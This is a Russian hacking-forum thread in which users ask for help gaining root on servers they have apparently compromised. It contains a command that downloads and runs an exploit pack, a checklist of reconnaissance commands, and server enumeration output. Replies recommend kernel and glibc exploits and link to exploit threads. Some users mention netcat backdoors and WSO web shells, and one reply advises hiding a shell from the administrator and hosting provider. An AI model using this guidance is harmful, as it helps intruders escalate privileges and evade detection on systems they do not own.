Форум АНТИЧАТ - Повышение прав [задай вопрос

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)

- - Повышение прав [задай вопрос - получи ответ] (https://forum.antichat.xyz/showthread.php?t=296327)

Эта тема создана для вопросов связанных с повышением привилегий (рутинг, компиляция сплоитов, помощь в поиске сплоитов) на взломанных машинах.

Первая часть темы тут.

Мануал новичкам: Рутанье

Сплоиты можно найти тут и тут

Связка сплоитов enlightenment запускается так:

Код:

Code:

1. wget http://www.grsecurity.net/~spender/exploits/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh

2. Выбираем сплоит.

3. PROFIT!!!

ПОСТЫ ОФОРМЛЕННЫЕ ОТЛИЧНО ОТ ПРАВИЛ ПЕРВОГО ПОСТА, УДАЛЯЮТСЯ! пруф

Внимание!

Если в выводе команды uname -a, вы наблюдаете нечто похожее: Linux ****** 2.*.**-NX

Это сервер принадлежит компании SpaceWeb (sweb.ru), и порутать его (сервер) практически невозможно! Так что все посты в котором фигурирует эти сервера (сервера SpaceWeb) УДАЛЯЮТСЯ!

Тоже самое касается серверов компанийДжино (www.jino.ru), Мастерхост (masterhost.ru) и 1gb (1gb.ru). пруф

Сообщение с вопросом должно содержать информацию из вывода следующих команд:

uname -a
ls -la /boot
lls -la --full-time /lib (или /lib64)
mount
df -h
cat /etc/issue
cat /etc/crontab (ls -la cron.d, cron.hourly, cron.monthly, cron.weekly) + вывод содержимого каждого файла из этих директорий.
cat /proc/version
cat /proc/sys/vm/mmap_min_addr
pwd
ls -la /usr/bin/staprun
find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null

Так же обязательно писать всё, что вы пробовали для повышения привилегий, какие возникли ошибки.

Пример сообщения:

Цитата:

Сообщение от Новичок

Новичок said:

Код:

Code:

sh-3.2# uname -a

Linux 2.6.18-194.8.1.el5 #1 SMP Thu Jul 1 19:04:48 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux

sh-3.2# ls -la /lib/libc*

-rwxr-xr-x 1 root root 1693812 Jun 27 21:25 /lib/libc-2.5.so

-rwxr-xr-x 1 root root  191708 Jun 27 21:25 /lib/libcidn-2.5.so

lrwxrwxrwx 1 root root      14 Jun 30 03:04 /lib/libcidn.so.1 -> libcidn-2.5.so

lrwxrwxrwx 1 root root      17 Oct 22  2009 /lib/libcom_err.so.2 -> libcom_err.so.2.1

-rwxr-xr-x 1 root root    7748 Sep  3  2009 /lib/libcom_err.so.2.1

-rwxr-xr-x 1 root root   45432 Jun 27 21:25 /lib/libcrypt-2.5.so

-rwxr-xr-x 1 root root 1296964 Dec 15  2010 /lib/libcrypto.so.0.9.8e

lrwxrwxrwx 1 root root      14 Sep 15  2008 /lib/libcrypto.so.4 -> libcrypto.so.6

lrwxrwxrwx 1 root root      19 Dec 28  2010 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e

lrwxrwxrwx 1 root root      15 Jun 30 03:04 /lib/libcrypt.so.1 -> libcrypt-2.5.so

lrwxrwxrwx 1 root root      11 Jun 30 03:04 /lib/libc.so.6 -> libc-2.5.so

sh-3.2# ls -la /boot

total 17891

drwxr-xr-x  4 root root    3072 Aug  9  2010 .

drwxr-xr-x 29 root root    4096 Jun 23 03:02 ..

-rw-r--r--  1 root root       0 Mar 14  2010 1

-rwxr--r--  1 root root    6144 Dec 15  2009 aquota.user

-rw-r--r--  1 root root   65972 Jan 20  2010 config-2.6.18-164.11.1.el5

-rw-r--r--  1 root root   65972 Mar 17  2010 config-2.6.18-164.15.1.el5

-rw-r--r--  1 root root   66891 Jul  2  2010 config-2.6.18-194.8.1.el5

drwxr-xr-x  2 root root    1024 Aug  9  2010 grub

-rw-------  1 root root 2674675 Mar  9  2010 initrd-2.6.18-164.11.1.el5.img

-rw-------  1 root root 2674826 May  9  2010 initrd-2.6.18-164.15.1.el5.img

-rw-------  1 root root 2700121 Aug  9  2010 initrd-2.6.18-194.8.1.el5.img

drwx------  2 root root   12288 Sep 15  2008 lost+found

-rw-r--r--  1 root root   80032 Mar 16  2009 message

-rwxr--r--  1 root root      32 Dec 15  2009 quota.user

-rw-r--r--  1 root root  108759 Jan 20  2010 symvers-2.6.18-164.11.1.el5.gz

-rw-r--r--  1 root root  108759 Mar 17  2010 symvers-2.6.18-164.15.1.el5.gz

-rw-r--r--  1 root root  112713 Jul  2  2010 symvers-2.6.18-194.8.1.el5.gz

-rw-r--r--  1 root root 1227215 Jan 20  2010 System.map-2.6.18-164.11.1.el5

-rw-r--r--  1 root root 1227352 Mar 17  2010 System.map-2.6.18-164.15.1.el5

-rw-r--r--  1 root root 1243148 Jul  2  2010 System.map-2.6.18-194.8.1.el5

-rw-r--r--  1 root root 1936156 Jan 20  2010 vmlinuz-2.6.18-164.11.1.el5

-rw-r--r--  1 root root     163 Jan 20  2010 .vmlinuz-2.6.18-164.11.1.el5.hmac

-rw-r--r--  1 root root 1936444 Mar 17  2010 vmlinuz-2.6.18-164.15.1.el5

-rw-r--r--  1 root root     163 Mar 17  2010 .vmlinuz-2.6.18-164.15.1.el5.hmac

-rw-r--r--  1 root root 1954620 Jul  2  2010 vmlinuz-2.6.18-194.8.1.el5

-rw-r--r--  1 root root     162 Jul  2  2010 .vmlinuz-2.6.18-194.8.1.el5.hmac

sh-3.2# mount

/dev/sda5 on / type ext3 (rw,usrquota)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

devpts on /dev/pts type devpts (rw,gid=5,mode=620)

/dev/sda8 on /tmp type ext3 (rw,noexec,nosuid)

/dev/sda7 on /home type ext3 (rw,usrquota)

/dev/sdb1 on /backup type ext3 (rw)

/dev/sda3 on /usr type ext3 (rw,usrquota)

/dev/sda2 on /var type ext3 (rw,usrquota)

/dev/sda1 on /boot type ext3 (rw)

tmpfs on /dev/shm type tmpfs (rw)

none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)

/tmp on /var/tmp type none (rw,noexec,nosuid,bind)

sunrpc on /var/lib/nfs/rpc_pipefs type rpc_pipefs (rw)

sh-3.2# pwd

/home/user

sh-3.2# df -h

Filesystem            Size  Used Avail Use% Mounted on

/dev/sda5             9.7G  987M  8.3G  11% /

/dev/sda8             996M   42M  903M   5% /tmp

/dev/sda7             195G   51G  134G  28% /home

/dev/sdb1             227G  163G   53G  76% /backup

/dev/sda3             9.7G  6.6G  2.6G  72% /usr

/dev/sda2             9.7G  5.5G  3.8G  60% /var

/dev/sda1              99M   24M   71M  25% /boot

tmpfs                 3.9G     0  3.9G   0% /dev/shm

sh-3.2# cat /etc/issue

This computer system is for authorized users only. Individuals using this

system without authority or in excess of their authority are subject to

having all their activities on this system monitored and recorded or

examined by any authorized person, including law enforcement, as system

personnel deem appropriate. In the course of monitoring individuals

improperly using the system or in the course of system maintenance, the

activities of authorized users may also be monitored and recorded. Any

material so recorded may be disclosed as appropriate. Anyone using this

system consents to these terms.

Пробовал enlightenment, не берет.

Оффтоп, флейм и тупые вопросы не приветствуются и удаляются, рецидивисты получают статус "рид-онли", однако грамотная помощь задающим вопросы поощряется.

FreeBSD 8.0

Есть проблема!

сервер :

FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010

Я залил эксплоит и сделал все как тут:

http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_camp aign=Feed%3A+attackvector+%28Attack+Vector%29

Затем меня выкинуло, и теперь не подключается неткат, пишет :

__________________________________________________ ________________________________

/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry

__________________________________________________ ________________________________

и не выкидывает.....

в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)

как можно выполнить на сервере команду еще?

попал в ступор... не пойму куда дальше двигаться...

sh-3.2$ uname -a

Linux HPX001.local 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 GNU/Lin

ux

sh-3.2$ ls -la /boot

total 15720

drwxr-xr-x 4 root root 1024 Feb 26 2009 .

drwxr-xr-x 21 root root 4096 Feb 26 2009 ..

-rw-r--r-- 1 root root 882741 Dec 2 2008 System.map-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 928053 Jan 10 2009 System.map-2.6.26-1-686

-rw-r--r-- 1 root root 86418 Dec 2 2008 config-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 91640 Jan 10 2009 config-2.6.26-1-686

drwxr-xr-x 2 root root 1024 Feb 26 2009 grub

-rw-r--r-- 1 root root 4870120 Dec 30 2008 initrd.img-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 6180050 Feb 26 2009 initrd.img-2.6.26-1-686

drwxr-xr-x 2 root root 12288 Dec 30 2008 lost+found

-rw-r--r-- 1 root root 1456344 Dec 2 2008 vmlinuz-2.6.24-etchnhalf.1-686

-rw-r--r-- 1 root root 1505936 Jan 10 2009 vmlinuz-2.6.26-1-686

sh-3.2$ ls -la --full-time /lib/libc*

-rwxr-xr-x 1 root root 1294572 2009-01-04 19:11:21.000000000 +0100 /lib/libc-2.7

.so

lrwxrwxrwx 1 root root 11 2009-02-26 03:56:51.000000000 +0100 /lib/libc.so.

6 -> libc-2.7.so

lrwxrwxrwx 1 root root 14 2009-02-26 04:01:28.000000000 +0100 /lib/libcap.s

o.2 -> libcap.so.2.11

-rw-r--r-- 1 root root 13364 2008-07-26 17:26:50.000000000 +0200 /lib/libcap.s

o.2.11

lrwxrwxrwx 1 root root 17 2009-02-26 03:57:01.000000000 +0100 /lib/libcfont

.so.0 -> libcfont.so.0.0.0

-rw-r--r-- 1 root root 10712 2008-04-15 23:18:10.000000000 +0200 /lib/libcfont

.so.0.0.0

-rw-r--r-- 1 root root 185816 2009-01-04 19:11:21.000000000 +0100 /lib/libcidn-

2.7.so

lrwxrwxrwx 1 root root 14 2009-02-26 03:56:51.000000000 +0100 /lib/libcidn.

so.1 -> libcidn-2.7.so

lrwxrwxrwx 1 root root 17 2009-02-26 03:56:52.000000000 +0100 /lib/libcom_e

rr.so.2 -> libcom_err.so.2.1

-rw-r--r-- 1 root root 8676 2008-10-13 05:33:34.000000000 +0200 /lib/libcom_e

rr.so.2.1

lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libconso

le.so.0 -> libconsole.so.0.0.0

-rw-r--r-- 1 root root 72816 2008-04-15 23:18:10.000000000 +0200 /lib/libconso

le.so.0.0.0

-rw-r--r-- 1 root root 38296 2009-01-04 19:11:21.000000000 +0100 /lib/libcrypt

-2.7.so

lrwxrwxrwx 1 root root 15 2009-02-26 03:56:51.000000000 +0100 /lib/libcrypt

.so.1 -> libcrypt-2.7.so

lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libctuti

ls.so.0 -> libctutils.so.0.0.0

-rw-r--r-- 1 root root 17024 2008-04-15 23:18:10.000000000 +0200 /lib/libctuti

ls.so.0.0.0

sh-3.2$ mount

/dev/cciss/c0d0p3 on / type ext3 (rw,errors=remount-ro)

tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)

proc on /proc type proc (rw,noexec,nosuid,nodev)

sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)

procbususb on /proc/bus/usb type usbfs (rw)

udev on /dev type tmpfs (rw,mode=0755)

tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)

devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)

/dev/cciss/c0d0p1 on /boot type ext2 (rw)

sh-3.2$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/cciss/c0d0p3 72G 6.1G 63G 9% /

tmpfs 1.8G 0 1.8G 0% /lib/init/rw

udev 10M 80K 10M 1% /dev

tmpfs 1.8G 0 1.8G 0% /dev/shm

/dev/cciss/c0d0p1 89M 16M 68M 19% /boot

sh-3.2$ cat /etc/issue

Debian GNU/Linux 5.0 \n \l

sh-3.2$ cat /etc/issue

Debian GNU/Linux 5.0 \n \l

sh-3.2$ cat /etc/crontab

# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the `crontab'

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,

# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

17 * * * * root cd / && run-parts --report /etc/cron.hourly

25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.daily )

47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.weekly )

52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor

t /etc/cron.monthly )

#

sh-3.2$ cat /proc/version

Linux version 2.6.26-1-686 (Debian 2.6.26-13) (waldi@debian.org) (gcc version 4.

1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009

Цитата:

Сообщение от rootxcl

rootxcl said:
sh-3.2$ uname -a
Linux HPX001.local 2.6.26-1-686 #1 SMP Sat Jan 10 18:29:31 UTC 2009 i686 GNU/Lin
ux
sh-3.2$ ls -la /boot
total 15720
drwxr-xr-x 4 root root 1024 Feb 26 2009 .
drwxr-xr-x 21 root root 4096 Feb 26 2009 ..
-rw-r--r-- 1 root root 882741 Dec 2 2008 System.map-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 928053 Jan 10 2009 System.map-2.6.26-1-686
-rw-r--r-- 1 root root 86418 Dec 2 2008 config-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 91640 Jan 10 2009 config-2.6.26-1-686
drwxr-xr-x 2 root root 1024 Feb 26 2009 grub
-rw-r--r-- 1 root root 4870120 Dec 30 2008 initrd.img-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 6180050 Feb 26 2009 initrd.img-2.6.26-1-686
drwxr-xr-x 2 root root 12288 Dec 30 2008 lost+found
-rw-r--r-- 1 root root 1456344 Dec 2 2008 vmlinuz-2.6.24-etchnhalf.1-686
-rw-r--r-- 1 root root 1505936 Jan 10 2009 vmlinuz-2.6.26-1-686
sh-3.2$ ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1294572 2009-01-04 19:11:21.000000000 +0100 /lib/libc-2.7
.so
lrwxrwxrwx 1 root root 11 2009-02-26 03:56:51.000000000 +0100 /lib/libc.so.
6 -> libc-2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 04:01:28.000000000 +0100 /lib/libcap.s
o.2 -> libcap.so.2.11
-rw-r--r-- 1 root root 13364 2008-07-26 17:26:50.000000000 +0200 /lib/libcap.s
o.2.11
lrwxrwxrwx 1 root root 17 2009-02-26 03:57:01.000000000 +0100 /lib/libcfont
.so.0 -> libcfont.so.0.0.0
-rw-r--r-- 1 root root 10712 2008-04-15 23:18:10.000000000 +0200 /lib/libcfont
.so.0.0.0
-rw-r--r-- 1 root root 185816 2009-01-04 19:11:21.000000000 +0100 /lib/libcidn-
2.7.so
lrwxrwxrwx 1 root root 14 2009-02-26 03:56:51.000000000 +0100 /lib/libcidn.
so.1 -> libcidn-2.7.so
lrwxrwxrwx 1 root root 17 2009-02-26 03:56:52.000000000 +0100 /lib/libcom_e
rr.so.2 -> libcom_err.so.2.1
-rw-r--r-- 1 root root 8676 2008-10-13 05:33:34.000000000 +0200 /lib/libcom_e
rr.so.2.1
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libconso
le.so.0 -> libconsole.so.0.0.0
-rw-r--r-- 1 root root 72816 2008-04-15 23:18:10.000000000 +0200 /lib/libconso
le.so.0.0.0
-rw-r--r-- 1 root root 38296 2009-01-04 19:11:21.000000000 +0100 /lib/libcrypt
-2.7.so
lrwxrwxrwx 1 root root 15 2009-02-26 03:56:51.000000000 +0100 /lib/libcrypt
.so.1 -> libcrypt-2.7.so
lrwxrwxrwx 1 root root 19 2009-02-26 03:57:01.000000000 +0100 /lib/libctuti
ls.so.0 -> libctutils.so.0.0.0
-rw-r--r-- 1 root root 17024 2008-04-15 23:18:10.000000000 +0200 /lib/libctuti
ls.so.0.0.0
sh-3.2$ mount
/dev/cciss/c0d0p3 on / type ext3 (rw,errors=remount-ro)
tmpfs on /lib/init/rw type tmpfs (rw,nosuid,mode=0755)
proc on /proc type proc (rw,noexec,nosuid,nodev)
sysfs on /sys type sysfs (rw,noexec,nosuid,nodev)
procbususb on /proc/bus/usb type usbfs (rw)
udev on /dev type tmpfs (rw,mode=0755)
tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)
devpts on /dev/pts type devpts (rw,noexec,nosuid,gid=5,mode=620)
/dev/cciss/c0d0p1 on /boot type ext2 (rw)
sh-3.2$ df -h
Filesystem Size Used Avail Use% Mounted on
/dev/cciss/c0d0p3 72G 6.1G 63G 9% /
tmpfs 1.8G 0 1.8G 0% /lib/init/rw
udev 10M 80K 10M 1% /dev
tmpfs 1.8G 0 1.8G 0% /dev/shm
/dev/cciss/c0d0p1 89M 16M 68M 19% /boot
sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l
sh-3.2$ cat /etc/issue
Debian GNU/Linux 5.0 \n \l
sh-3.2$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --repor
t /etc/cron.monthly )
#
sh-3.2$ cat /proc/version
Linux version 2.6.26-1-686 (Debian 2.6.26-13) (waldi@debian.org) (gcc version 4.
1.3 20080704 (prerelease) (Debian 4.1.2-24)) #1 SMP Sat Jan 10 18:29:31 UTC 2009

попробуй это :

https://rdot.org/forum/showthread.php?t=817

rootxcl:

Код:

Code:

1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh

2. Выбираем сплоит.

3. PROFIT!!!

Цитата:

Сообщение от Expl0ited

Expl0ited said:
rootxcl
:

Код:

Code:

1. wget http://www.grsecurity.net/~spender/enlightenment.tgz && tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh

2. Выбираем сплоит.

3. PROFIT!!!

Все сплоиты из enlightenment'a используют NULL-pointer.

Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.

rootxcl

Скинь результат выполнения команды cat /proc/sys/vm/mmap_min_addr 2>&1

Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))

Цитата:

Сообщение от Sidarovich1975

Sidarovich1975 said:
Есть проблема!
сервер :
FreeBSD 8.0-RELEASE-p2 #0: Thu May 20 16:16:55 UTC 2010
Я залил эксплоит и сделал все как тут:
http://www.attackvector.org/freebsd-8-7-local-root-exploit/?utm_source=feedburner&utm_medium=twitter&utm_camp aign=Feed%3A+attackvector+%28Attack+Vector%29
Затем меня выкинуло, и теперь не подключается неткат, пишет :
__________________________________________________ ________________________________
/libexec/ld-elf.so.1: /bin/sh: Unsupported version 37008 of Elf_Verneed entry
__________________________________________________ ________________________________
и не выкидывает.....
в wso 2.4 и wso 2.5 консоль не работает вообще (ни порт забиндить ни команду выполнить)
как можно выполнить на сервере команду еще?
попал в ступор... не пойму куда дальше двигаться...

Ты делал все с двух ТЕРМИНАЛОВ, как написано в сплоите или побрезговал и попытался все сделать с шелла?

Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601

Пролистай тему, там выложено две модификации.

Цитата:

Сообщение от Tigger

Tigger said:
Все сплоиты из enlightenment'a используют NULL-pointer.
Т.ч. если /proc/sys/vm/mmap_min_addr есть и его значение больше 0, то хер что выйдет.
rootxcl
Скинь результат выполнения команды
cat /proc/sys/vm/mmap_min_addr 2>&1
Если файл такой будет и значение больше чем 0, то пробуй Glibc (/tmp у тебя отдельно не примонтирован, должно взять без проблем. (дефолтая эксплуатация через либу libc-*.so))
Ты делал все с
двух ТЕРМИНАЛОВ
, как написано в сплоите или побрезговал и попытался все сделать с шелла?
Ну чтож, жди пока админ починит и попробуй потом более упрощенные версии даного сплоита отсюда: https://rdot.org/forum/showthread.php?t=601
Пролистай тему, там выложено две модификации.

не, ну написал же... ВСЕ как по ссылке... ну а админ как поймет, что что-то неладно? там порт открытый висел х.з. сколько. нужен вариант другой какой-то, чтобы команды выполнять...

Цитата:

Сообщение от Sidarovich1975

Sidarovich1975 said:
не, ну написал же... ВСЕ как по ссылке... ну а админ как поймет, что что-то неладно? там порт открытый висел х.з. сколько. нужен вариант другой какой-то, чтобы команды выполнять...

Ну админ, поймёт что что-то не так, как минимум из-за того что у него команды в консоле тоже не будут выполнятся...как и у любого другого пользователя! Думаю ответ на вопрос о другом варианте отпал ? пока не исправят последствия твоих действий...консоль не заработает! Так что единственное что ты можешь сделать, это постараться спрятать шелл так, что бы его не нашли...т.к. если не админ, так его хостер 100% буду проверять сервак на наличии шелов.

Народ сможет кто помочь с этим:

Цитата:

Сообщение от None

uname -a
Linux ns1.***.de 2.6.18-338.19.1.el5.lve0.8.36 #1 SMP Wed Jul 27 13:20:06 EEST 2011 x86_64 x86_64 x86_64 GNU/Linux
ls -la /boot
drwxr-xr-x 3 root root 4096 Oct 4 06:06 .
drwxr-xr-x 26 root root 4096 Oct 5 05:03 ..
-rw-r--r-- 1 root root 163 Jul 15 14:04 .vmlinuz-2.6.18-238.19.1.el5.hmac
-rw-r--r-- 1 root root 158 Jan 13 2011 .vmlinuz-2.6.18-238.el5.hmac
-rw-r--r-- 1 root root 162 Sep 7 02:46 .vmlinuz-2.6.18-274.3.1.el5.hmac
-rw-r--r-- 1 root root 1261160 Jul 15 14:04 System.map-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 1260254 Jan 13 2011 System.map-2.6.18-238.el5
-rw-r--r-- 1 root root 1268881 Sep 7 02:46 System.map-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 1312050 Jul 27 12:26 System.map-2.6.18-338.19.1.el5.lve0.8.36
-rw-r--r-- 1 root root 67215 Jul 15 14:04 config-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 67210 Jan 13 2011 config-2.6.18-238.el5
-rw-r--r-- 1 root root 67613 Sep 7 02:46 config-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 68013 Jul 27 12:26 config-2.6.18-338.19.1.el5.lve0.8.36
drwxr-xr-x 2 root root 4096 Oct 5 01:51 grub
-rw------- 1 root root 2676916 Aug 31 13:25 initrd-2.6.18-238.19.1.el5.img
-rw------- 1 root root 2676109 Aug 31 19:22 initrd-2.6.18-238.el5.img
-rw------- 1 root root 2683316 Sep 22 08:32 initrd-2.6.18-274.3.1.el5.img
-rw------- 1 root root 2683198 Oct 4 06:06 initrd-2.6.18-338.19.1.el5.lve0.8.36.img
-rw-r--r-- 1 root root 113923 Jul 15 14:04 symvers-2.6.18-238.19.1.el5.gz
-rw-r--r-- 1 root root 113923 Jan 13 2011 symvers-2.6.18-238.el5.gz
-rw-r--r-- 1 root root 116158 Sep 7 02:47 symvers-2.6.18-274.3.1.el5.gz
-rw-r--r-- 1 root root 121331 Jul 27 12:27 symvers-2.6.18-338.19.1.el5.lve0.8.36.gz
-rw-r--r-- 1 root root 2097180 Jul 15 14:04 vmlinuz-2.6.18-238.19.1.el5
-rw-r--r-- 1 root root 2094652 Jan 13 2011 vmlinuz-2.6.18-238.el5
-rw-r--r-- 1 root root 2106012 Sep 7 02:46 vmlinuz-2.6.18-274.3.1.el5
-rw-r--r-- 1 root root 2010108 Jul 27 12:26 vmlinuz-2.6.18-338.19.1.el5.lve0.8.36
ls -la --full-time /lib/libc*
-rwxr-xr-x 1 root root 1693812 2011-08-12 19:48:50.000000000 +0200 /lib/libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-09-14 02:06:44.000000000 +0200 /lib/libc.so.6 -> libc-2.5.so
lrwxrwxrwx 1 root root 11 2011-08-31 19:18:03.000000000 +0200 /lib/libcap.so -> libcap.so.1
lrwxrwxrwx 1 root root 14 2011-08-31 19:17:36.000000000 +0200 /lib/libcap.so.1 -> libcap.so.1.10
-rwxr-xr-x 1 root root 11560 2007-03-14 19:15:10.000000000 +0100 /lib/libcap.so.1.10
-rwxr-xr-x 1 root root 191708 2011-08-12 19:48:50.000000000 +0200 /lib/libcidn-2.5.so
lrwxrwxrwx 1 root root 14 2011-09-14 02:06:44.000000000 +0200 /lib/libcidn.so.1 -> libcidn-2.5.so
lrwxrwxrwx 1 root root 17 2011-09-14 02:06:57.000000000 +0200 /lib/libcom_err.so.2 -> libcom_err.so.2.1
-rwxr-xr-x 1 root root 6364 2011-07-22 07:04:15.000000000 +0200 /lib/libcom_err.so.2.1
-rwxr-xr-x 1 root root 45432 2011-08-12 19:48:50.000000000 +0200 /lib/libcrypt-2.5.so
lrwxrwxrwx 1 root root 15 2011-09-14 02:06:44.000000000 +0200 /lib/libcrypt.so.1 -> libcrypt-2.5.so
-rwxr-xr-x 1 root root 1295616 2011-09-14 21:45:12.000000000 +0200 /lib/libcrypto.so.0.9.8e
lrwxrwxrwx 1 root root 14 2011-08-31 13:52:57.000000000 +0200 /lib/libcrypto.so.4 -> libcrypto.so.6
lrwxrwxrwx 1 root root 19 2011-10-04 06:16:31.000000000 +0200 /lib/libcrypto.so.6 -> libcrypto.so.0.9.8e
mount
/dev/sda1 on / type ext3 (rw,usrquota)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
tmpfs on /dev/shm type tmpfs (rw)
/dev/sdb1 on /hdd2 type ext3 (rw)
none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
/usr/tmpDSK on /tmp type ext3 (rw,noexec,nosuid,loop=/dev/loop0)
/tmp on /var/tmp type none (rw,noexec,nosuid,bind)
df -h
Filesystem Size Used Avail Use% Mounted on
/dev/sda1 899G 77G 776G 9% /
tmpfs 7.8G 0 7.8G 0% /dev/shm
/dev/sdb1 917G 148G 723G 17% /hdd2
/usr/tmpDSK 485M 23M 438M 5% /tmp
cat /etc/issue
CloudLinux Server release 5.7
Kernel \r on an \m
cat /etc/crontab
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
MAILTO=root
HOME=/
# run-parts
01 * * * * root run-parts /etc/cron.hourly
02 4 * * * root run-parts /etc/cron.daily
22 4 * * 0 root run-parts /etc/cron.weekly
42 4 1 * * root run-parts /etc/cron.monthly
cat /proc/version
Linux version 2.6.18-338.19.1.el5.lve0.8.36 (***@***.com) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-51)) #1 SMP Wed Jul 27 13:20:06 EEST 2011
cat /proc/sys/vm/mmap_min_addr
4096

пробовал: enlightenment и сплоиты 2.6.18-ветки, компилятора на сервире нет или не доступен...

winstrool, не рутается.

Цитата:

Сообщение от None

Jul 27 13:20:06 EEST 2011